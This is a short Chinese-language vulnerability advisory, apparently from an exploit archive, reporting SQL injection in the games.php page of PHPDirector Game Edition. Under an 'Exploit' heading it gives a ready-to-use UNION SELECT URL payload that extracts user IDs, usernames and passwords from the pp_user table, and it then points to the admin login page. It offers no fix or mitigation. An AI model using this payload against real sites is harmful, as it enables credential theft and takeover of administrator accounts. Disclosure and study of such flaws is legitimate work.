PHPDirector Game Edition (game.php) Sql Injection

发布日期：2011-01.27
发布作者：[email protected]

影响版本：未知
官方网站：http://scriptsgratuits.info/Scripts/PHP/Jeux/PHPDirector-Game-Edition_7.html

漏洞类型：SQL注入
漏洞描述：games.php页面参数缺少过滤导致SQL注入。

===[ Exploit ]===

http://www.site.com/games.php?id=null[Sql Injection]

http://www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user

===[ Admin Panel ]===

www.site.com/admin/login.php

标签分类： 注入漏洞 SQL注入